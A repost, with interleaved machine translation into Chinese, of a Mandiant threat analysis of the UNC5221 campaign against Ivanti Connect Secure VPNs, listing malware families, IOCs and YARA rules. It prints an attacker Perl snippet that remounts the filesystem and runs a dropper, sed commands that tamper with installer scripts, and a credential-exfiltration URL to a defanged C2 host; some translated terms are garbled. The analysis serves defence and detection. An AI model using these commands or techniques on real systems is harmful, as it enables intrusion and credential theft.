Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation

APT 1个月前 admin
80 0 0

Note: This is a developing campaign under active analysis by Mandiant and Ivanti. We will continue to add more indicators, detections, and information to this blog post as needed.
注意:这是一项正在开发中的活动,由 Mandiant 和 Ivanti 积极分析。我们将继续根据需要向这篇博文添加更多指标、检测和信息。

On January 10, 2024, Ivanti disclosed two vulnerabilities, CVE-2023-46805 and CVE-2024-21887, impacting Ivanti Connect Secure VPN (“CS”, formerly Pulse Secure) and Ivanti Policy Secure (“PS”) appliances. Successful exploitation could result in authentication bypass and command injection, leading to further downstream compromise of a victim network. Mandiant has identified zero-day exploitation of these vulnerabilities in the wild beginning as early as December 2023 by a suspected espionage threat actor, currently being tracked as UNC5221. 
2024 年 1 月 10 日,Ivanti 披露了两个漏洞,CVE-2023-46805 和 CVE-2024-21887,影响了 Ivanti Connect Secure VPN(“CS”,前身为 Pulse Secure)和 Ivanti Policy Secure(“PS”)设备。成功利用此漏洞可导致绕过身份验证和命令注入,从而进一步入侵受害网络的下游。Mandiant 早在 2023 年 12 月就发现,一名可疑的间谍威胁行为者对这些漏洞进行了零日利用,目前被追踪为 UNC5221。

Ivanti has been working closely with Mandiant, affected customers, government partners, and Volexity to address these issues. As part of their investigation, Ivanti has released a blog post and mitigations for the vulnerabilities exploited in this campaign to assist with determining if systems have been impacted. Patches are currently being developed and Ivanti customers are urged to follow the KB article to stay informed on target dates and releases. 
Ivanti 一直与 Mandiant、受影响的客户、政府合作伙伴和 Volexity 密切合作,以解决这些问题。作为调查的一部分,Ivanti 发布了一篇博客文章,并针对此活动中利用的漏洞采取了缓解措施,以帮助确定系统是否受到影响。补丁目前正在开发中,我们敦促 Ivanti 客户关注知识库文章,随时了解目标日期和版本。

Mandiant is sharing details of five malware families associated with the exploitation of CS and PS devices. These families allow the threat actors to circumvent authentication and provide backdoor access to these devices. Additional post-exploitation tools have also been identified in our investigation and are highlighted further in this post. For even more analysis and technical details, register for our webinar on January 18, 2023 or watch it on demand following the presentation.
Mandiant 正在分享与利用 CS 和 PS 设备相关的五个恶意软件家族的详细信息。这些系列允许威胁参与者规避身份验证并提供对这些设备的后门访问。在我们的调查中还发现了其他开发后工具,并在本文中进一步强调。如需更多分析和技术细节,请注册参加我们 2023 年 1 月 18 日的网络研讨会,或在演示后点播观看。

Post Exploitation Activity
开发后活动

Following the successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection), UNC5221 leveraged multiple custom malware families, in several cases trojanizing legitimate files within CS with malicious code. UNC5221 was also observed leveraging the PySoxy tunneler and BusyBox to enable post-exploitation activity. 
在成功利用 CVE-2023-46805(身份验证绕过)和 CVE-2024-21887(命令注入)之后,UNC5221利用了多个自定义恶意软件系列,在一些情况下使用恶意代码对 CS 中的合法文件进行木马化。还观察到UNC5221利用 PySoxy 隧道机和 BusyBox 来实现开发后活动。

Due to certain sections of the device being read-only, UNC5221 leveraged a Perl script (sessionserver.pl) to remount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes the web shell LIGHTWIRE to a legitimate Connect Secure file, and other follow-on tooling.
由于设备的某些部分是只读的,UNC5221利用 Perl 脚本 ( sessionserver.pl ) 将文件系统重新挂载为读/写,并启用 THINSPOOL、将 Web shell LIGHTWIRE 写入合法 Connect Secure 文件的 shell 脚本投放器以及其他后续工具的部署。

use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl";

use DSSafe;

system("mount -o remount,rw /");

system("chmod a+x /home/etc/sql/dsserver/sessionserver.sh");

system("/home/etc/sql/dsserver/sessionserver.sh 1>/dev/null 2>/tmp/errlog");

system("mount -o remount,ro /");

Mandiant has determined that THINSPOOL acts as a key tool for both persistence and detection evasion, in addition to being the initial dropper for the LIGHTWIRE web shell used by UNC5221 for post-exploitation activity. The LIGHTWIRE and WIREFIRE web shells used by UNC5221, post-compromise, are lightweight footholds enabling further and continued access to the CS appliances. This indicates that these are not opportunistic attacks, and UNC5221 intended to maintain its presence on a subset of high priority targets that it compromised after a patch was inevitably released. Additionally, the WARPWIRE Javascript credential stealer may also enable further access to accounts for lateral movement or espionage by capturing plaintext login credentials.  
Mandiant 已经确定,THINSPOOL 除了是 UNC5221 用于漏洞利用后活动的 LIGHTWIRE Web 外壳的初始投放器外,还充当了持久性和检测规避的关键工具。UNC5221使用的 LIGHTWIRE 和 WIREFIRE Web 外壳在妥协后是轻量级的立足点,可以进一步和持续地访问 CS 设备。这表明这些不是机会主义攻击,UNC5221旨在保持其在不可避免地发布补丁后受到损害的高优先级目标子集上的存在。此外,WARPWIRE Javascript 凭据窃取程序还可以通过捕获明文登录凭据来进一步访问帐户以进行横向移动或间谍活动。

Custom Malware Identified 
识别的自定义恶意软件

ZIPLINE Passive Backdoor ZIPLINE 被动后门

ZIPLINE is a passive backdoor that hijacks an exported function, accept(), from the file libsecure.so. When ZIPLINE invokes the hijacked accept() function, it first resolves the benign accept() from libc, to intercept network traffic. Once an incoming connection is registered, it is first processed by the benign libc_accept, and ZIPLINE then checks if the process name is “web”. The malware retrieves up to 21 bytes from the connected host, verifying if the received buffer corresponds to the string “SSH-2.0-OpenSSH_0.3xx.”  If so, the malicious functionality of ZIPLINE is triggered. ZIPLINE will then receive an encrypted header which specifies the command to be executed. Further details about this hijacking technique for the accept() function can be found in this SecureIdeas post.
ZIPLINE 是一个被动后门,它从文件 libsecure.so 劫持导出的函数 accept() 。当 ZIPLINE 调用被劫持 accept() 的函数时,它首先解析良性 accept() from libc ,以拦截网络流量。一旦注册了传入连接,它首先由良性 处理 libc_accept ,然后 ZIPLINE 检查进程名称是否为“web”。恶意软件从连接的主机检索最多 21 个字节,验证接收的缓冲区是否对应于字符串“SSH-2.0-OpenSSH_0.3xx”。 如果是这样,则触发了 ZIPLINE 的恶意功能。然后,ZIPLINE 将收到一个加密标头,该标头指定要执行的命令。有关该 accept() 函数的这种劫持技术的更多详细信息,请参阅此 SecureIdeas 帖子。

ZIPLINE supports the following commands:
ZIPLINE 支持以下命令:

Command ID 命令 ID

Operation 操作

Description 描述

1

File Upload 文件上传

The command contains the path of the file to be sent to the connected host.
该命令包含要发送到连接主机的文件的路径。

2

File Download 文件下载

The command contains the file path and its content to be saved on the compromised system.
该命令包含要保存在受感染系统上的文件路径及其内容。

3

Reverse Shell 反壳

A reverse shell is created using /bin/sh and the provided command is executed
使用 /bin/sh 创建反向 shell 并执行提供的命令

4

Proxy Server 代理服务器

Creates a proxy server with an IP address provided as part of the command.
使用命令中提供的 IP 地址创建代理服务器。

5

Tunneling Server 隧道服务器

Implements a tunneling server, capable of simultaneously dispatching traffic between multiple endpoints.
实现隧道服务器,能够在多个端点之间同时调度流量。

Upon initialization, ZIPLINE copies /etc/ld.so.preload to /tmp/data/root/etc/ld.so.preload, which will be executed if the process name is “dspkginstall”. ZIPLINE then copies itself to /tmp/data/root/home/lib.
初始化时,ZIPLINE 将复制到 ,如果进程名称为“dspkginstall” /tmp/data/root/etc/ld.so.preload ,则将 /etc/ld.so.preload 执行该命令。然后,ZIPLINE 将自身复制到 /tmp/data/root/home/lib 。

Upon termination ZIPLINE first checks if the process name is tar. If the process name is tar, the malware executes different functionalities based on the provided parameters: -xzf--exclude, or ./installer.
终止后,ZIPLINE 首先检查进程名称是否为 tar。如果进程名称为 tar,则恶意软件会根据提供的参数执行不同的功能: -xzf 、 --exclude 或 ./installer 。

If the parameter --exclude is used, ZIPLINE will add itself to the CS exclusion_list. The exclusion_list is part of the Ivanti Integrity Checker Tool and Mandiant assesses this is a measure implemented by the attacker to evade detection. 
如果使用该参数 --exclude ,ZIPLINE 会将自身添加到 CS exclusion_list 中。这是 exclusion_list Ivanti 完整性检查器工具的一部分,Mandiant 评估这是攻击者为逃避检测而实施的措施。

If the parameter -xzf is used, ZIPLINE computes its own SHA256 hash, formats the line <sha256>  ./root<self_fpath>, and then appends this string to each file within the ./installer/bom_files directory. This is achieved using the command: echo <formatted_sha256_string> >> ./installer/bom_files/<file_name>.
如果使用该参数 -xzf ,则 ZIPLINE 将计算自己的 SHA256 哈希,设置行 <sha256>  ./root<self_fpath> 的格式,然后将此字符串追加到 ./installer/bom_files 目录中的每个文件。这是使用以下命令实现的: echo <formatted_sha256_string> >> ./installer/bom_files/<file_name> 。

If the parameter ./installer is used,  ZIPLINE deletes specific lines from /pkg/do-install and ./installer/do-install. To do so, it executes the following sed commands:
如果使用该参数 ./installer ,则 ZIPLINE 将从 /pkg/do-install 和 ./installer/do-install 中删除特定行。为此,它会执行以下 sed 命令:

sed -i '/retval=$(exec $installer $@)/d' /pkg/do-install

sed -i '/exit $?/d' /pkg/do-install

sed -i '/retval=$(exec $installer $@)/d' ./installer/do-install

sed -i '/exit $?/d' ./installer/do-install 

THINSPOOL Dropper THINSPOOL 滴管

THINSPOOL is a dropper written in shell script that writes the web shell LIGHTWIRE to a legitimate CS file. THINSPOOL will re-add the malicious web shell code to legitimate files after an update, allowing UNC5221 to persist on the compromised devices. THINSPOOL attempts to evade Ivanti’s Integrity Checker but Mandiant observed this attempt failed.
THINSPOOL 是一个用 shell 脚本编写的 dropper,它将 web shell LIGHTWIRE 写入合法的 CS 文件。更新后,THINSPOOL 会将恶意 Web Shell 代码重新添加到合法文件中,从而允许UNC5221在受感染的设备上持续存在。THINSPOOL 试图逃避 Ivanti 的完整性检查器,但 Mandiant 发现这次尝试失败了。

LIGHTWIRE and WIREFIRE Web Shells
LIGHTWIRE 和 WIREFIRE 卷筒纸外壳

LIGHTWIRE is a web shell written in Perl CGI that is embedded into a legitimate Secure Connect file to enable arbitrary command execution. LIGHTWIRE intercepts requests to compcheckresult.cgi that contain the parameters “comp=comp” and “compid”, where “compid” contains Base64-encoded and RC4-encrypted ciphertext. The decoded cleartext is interpreted and executed as Perl code.
LIGHTWIRE 是一个用 Perl CGI 编写的 Web shell,它嵌入到合法的 Secure Connect 文件中以启用任意命令执行。LIGHTWIRE 拦截包含参数 “ ” 和 “ compid 的请求,其中 ” compid “ comp=comp 包含 compcheckresult.cgi Base64 编码和 RC4 加密的密文。解码后的明文被解释为Perl代码并执行。

WIREFIRE is a web shell written in Python that exists as trojanized logic to a component of the Connect Secure appliance. WIREFIRE supports downloading files to the compromised device and executing arbitrary commands. It contains logic inserted before authentication that responds to specific HTTP POST requests to /api/v1/cav/client/visits. If formdata entry “file” exists, the web shell saves the content to the device with a specified filename; if not, the web shell attempts to decode, decrypt, and zlib decompress any raw data existing after a GIF header to execute as a subprocess. The output of the executed process will be zlib compressed, AES-encrypted with the same key, and Base64-encoded before being sent back as JSON with a “message” field via an HTTP 200 OK.
WIREFIRE 是用 Python 编写的 Web shell,作为特洛伊木马逻辑存在于 Connect Secure 设备的组件中。WIREFIRE支持将文件下载到受感染的设备并执行任意命令。它包含在身份验证之前插入的逻辑,用于响应对 的特定 /api/v1/cav/client/visits HTTP POST 请求。如果formdata条目“ file ”存在,则Web Shell将内容保存到具有指定文件名的设备中;否则,Web Shell 会尝试解码、解密和 zlib 解压缩 GIF 标头之后存在的任何原始数据,以作为子进程执行。执行进程的输出将经过 zlib 压缩,使用相同的密钥进行 AES 加密,并进行 Base64 编码,然后通过 HTTP 200 OK 以带有“ message ”字段的 JSON 格式发送回。

WARPWIRE Credential Harvester
WARPWIRE 凭证收集器

WARPWIRE is a credential harvester written in Javascript that is embedded into a legitimate Connect Secure file. WARPWIRE targets plaintext passwords and usernames which are submitted via a HTTP GET request to a command and control (C2) server.
WARPWIRE 是一个用 Javascript 编写的凭据收集器,嵌入到合法的 Connect Secure 文件中。WARPWIRE 以通过 HTTP GET 请求提交到命令和控制 (C2) 服务器的纯文本密码和用户名为目标。

WARPWIRE captures credentials submitted during the web logon to access layer 7 applications, like RDP. Captured credentials are Base64-encoded with btoa() before they are submitted to the C2 via a HTTP GET request.
WARPWIRE 捕获在 Web 登录期间提交的凭据,以访问第 7 层应用程序,如 RDP。捕获的凭据在通过 HTTP GET 请求提交到 C2 之前使用 btoa() Base64 编码。

hxxps://symantke[.]com/?<username>&<password>

Attribution 归 因

At the time of publication, Mandiant had not linked this activity to a previously known group, nor do we currently have enough data to assess the origin of this threat actor. UNC5221 was created to track this suspected espionage actor. The targeting of edge infrastructure with zero-day vulnerabilities has been a consistent tactic leveraged by espionage actors to enable their operations. Additionally, Mandiant has previously observed multiple suspected APT actors utilizing appliance specific malware to enable post-exploitation and evade detection. These instances, combined with Volexity’s findings around targeting, leads Mandiant to suspect this is an espionage-motivated APT campaign. 
在发布时,Mandiant 尚未将此活动与先前已知的团体联系起来,我们目前也没有足够的数据来评估该威胁参与者的来源。创建UNC5221是为了追踪这名可疑的间谍行为者。针对具有零日漏洞的边缘基础设施一直是间谍行为者用来实现其运营的一贯策略。此外,Mandiant 之前还观察到多个可疑的 APT 行为者利用特定于设备的恶意软件来实现漏洞利用和逃避检测。这些实例,再加上 Volexity 关于目标的发现,导致 Mandiant 怀疑这是一场以间谍活动为动机的 APT 活动。

UNC5221 primarily used compromised out-of-support Cyberoam VPN appliances for C2. These compromised devices were domestic to the victims, which likely helped the threat actor to better evade detection.
UNC5221主要使用受感染的 C2 不支持的 Cyberoam VPN 设备。这些受感染的设备是受害者的家用设备,这可能有助于威胁行为者更好地逃避检测。

Conclusion & Recommendations
结论与建议

UNC5221’s activity demonstrates that exploiting and living on the edge of networks remains a viable and attractive target for espionage actors. As we have previously reported, the combination of zero-day exploitation, edge device compromise, use of compromised C2 infrastructure, and detection evasion methods such as writing code to legitimate files have become a hallmark of espionage actors’ toolboxes.
UNC5221的活动表明,对间谍行为者来说,利用网络边缘和生活在网络边缘仍然是一个可行且有吸引力的目标。正如我们之前报道的那样,零日漏洞利用、边缘设备入侵、使用受感染的 C2 基础设施以及检测规避方法(例如将代码写入合法文件)的结合已成为间谍行为者工具箱的标志。

We recommend following the guidance outlined in the Ivanti blog post on this activity. Ivanti customers are urged to implement mitigation as soon as possible and to follow the post for upcoming patch release schedules. Details about Ivanti’s Integrity Checker Tool (ICT) are also available.
我们建议遵循 Ivanti 博客文章中有关此活动的指南。我们敦促 Ivanti 客户尽快实施缓解措施,并关注即将发布的补丁发布时间表。此外,还提供有关 Ivanti 完整性检查工具 (ICT) 的详细信息。

Acknowledgement 确认

We would like to thank the team at Ivanti for their partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from people across Mandiant Intelligence, Consulting, and FLARE as well as our colleagues on Google TAG. We would like to specifically acknowledge Aseel Kayal and Nick Simonian from Mandiant’s Adversary Methods Research and Discovery (RAD) team for their support of this investigation.
我们要感谢 Ivanti 团队在此次调查中的合作和支持。此外,如果没有 Mandiant Intelligence、Consulting 和 FLARE 的人员以及我们在 Google TAG 上的同事的帮助,这项分析是不可能实现的。我们要特别感谢 Mandiant 的对手方法研究与发现 (RAD) 团队的 Aseel Kayal 和 Nick Simonian 对本次调查的支持。

Indicators of Compromise (IOCs)
入侵指标 (IOC)

Code Family 代码族

Filename 文件名

Description 描述

LIGHTWIRE 灯丝

compcheckresult.cgi

Web shell Web 外壳

THINSPOOL 薄水池

sessionserver.sh

Web shell dropper Web 外壳滴管

WARPWIRE 华普连

lastauthserverused.js

Credential harvester 凭据收集器

WIREFIRE 线火

visits.py

Web shell Web 外壳

THINSPOOL Utility THINSPOOL 实用程序

sessionserver.pl

Script 脚本

ZIPLINE 高空滑索

libsecure.so.1

Passive backdoor 被动后门

Network-Based Indicators (NBIs)
基于网络的指标 (NBI)

symantke[.]com 赛门特克[.]com

WARPWIRE C2 华普线 C2

YARA Rules YARA规则

rule M_Hunting_Backdoor_ZIPLINE_1 {

  meta:

    author = "Mandiant"

    description = "This rule detects unique strings in ZIPLINE, a passive ELF backdoor that waits for incoming TCP connections to receive commands from the threat actor."

  strings:

    $s1 = "SSH-2.0-OpenSSH_0.3xx" ascii

    $s2 = "$(exec $installer $@)" ascii

    $t1 = "./installer/do-install" ascii

    $t2 = "./installer/bom_files/" ascii

    $t3 = "/tmp/data/root/etc/ld.so.preload" ascii

    $t4 = "/tmp/data/root/home/etc/manifest/exclusion_list" ascii

  condition:

    uint32(0) == 0x464c457f and

    filesize < 5MB and

    ((1 of ($s*)) or

    (3 of ($t*)))

}

rule M_Hunting_Dropper_WIREFIRE_1 {

  meta:

    author = "Mandiant"

    description = "This rule detects WIREFIRE, a web shell written in Python that exists as trojanized logic to a component of the pulse secure appliance."

    md5 = "6de651357a15efd01db4e658249d4981"

  strings:

    $s1 = "zlib.decompress(aes.decrypt(base64.b64decode(" ascii

    $s2 = "aes.encrypt(t+('\\x00'*(16-len(t)%16))" ascii

    $s3 = "Handles DELETE request to delete an existing visits data." ascii

    $s4 = "request.data.decode().startswith('GIF'):" ascii

    $s5 = "Utils.api_log_admin" ascii

  condition:

    filesize < 10KB

    and all of them

}

rule M_Hunting_Webshell_LIGHTWIRE_2 {

  meta:

    author = "Mandiant"

    description = "Detects LIGHTWIRE based on the RC4 
decoding and execution 1-liner."

    md5 = "3d97f55a03ceb4f71671aa2ecf5b24e9"

  strings:

    $re1 = /eval\{my.{1,20}Crypt::RC4->new\(\".{1,50}->RC4\
(decode_base64\(CGI::param\(\'.{1,30};eval\s\$.{1,30}\"Compatibility
\scheck:\s\$@\";\}/

  condition:

    filesize < 10KB

    and all of them

}

rule M_Hunting_Dropper_THINSPOOL_1 {

  meta:

    author = "Mandiant"

    description = "This rule detects THINSPOOL, a dropper that 
installs the LIGHTWIRE web shell onto a Pulse Secure system."

    md5 = "677c1aa6e2503b56fe13e1568a814754"

  strings:

    $s1 = "/tmp/qactg/" ascii

    $s2 = "echo '/home/config/dscommands'" ascii

    $s3 = "echo '/home/perl/DSLogConfig.pm'" ascii

    $s4 = "ADM20447" ascii

  condition:

    filesize < 10KB

    and all of them

}

rule M_Hunting_CredTheft_WARPWIRE_1

{

  meta:

    author = "Mandiant"

    description = "This rule detects WARPWIRE, a credential stealer 
written in Javascript that is embedded into a legitimate Pulse Secure file."

    md5 = "d0c7a334a4d9dcd3c6335ae13bee59ea"

  strings:

    $s1 = {76 61 72 20 77 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 
74 2e 66 72 6d 4c 6f 67 69 6e 2e 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 3b}

    $s2 = {76 61 72 20 73 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 
74 2e 66 72 6d 4c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 2e 76 61 6c 75 65 3b}

    $s3 = {2b 77 64 61 74 61 2b 27 26 27 2b 73 64 61 74 61 3b}

    $s4 = {76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 
74 74 70 52 65 71 75 65 73 74}

    $s5 = "Remember the last selected auth realm for 30 days" ascii

  condition:

   filesize < 8KB and 

all of them

}

原文始发于TYLER MCLELLAN, JOHN WOLFRAM, GABBY RONCONE, MATT LIN, ROBERT WALLACE, DIMITER ANDONOV:Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation

版权声明:admin 发表于 2024年1月22日 下午10:45。
转载请注明:Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation | CTF导航

相关文章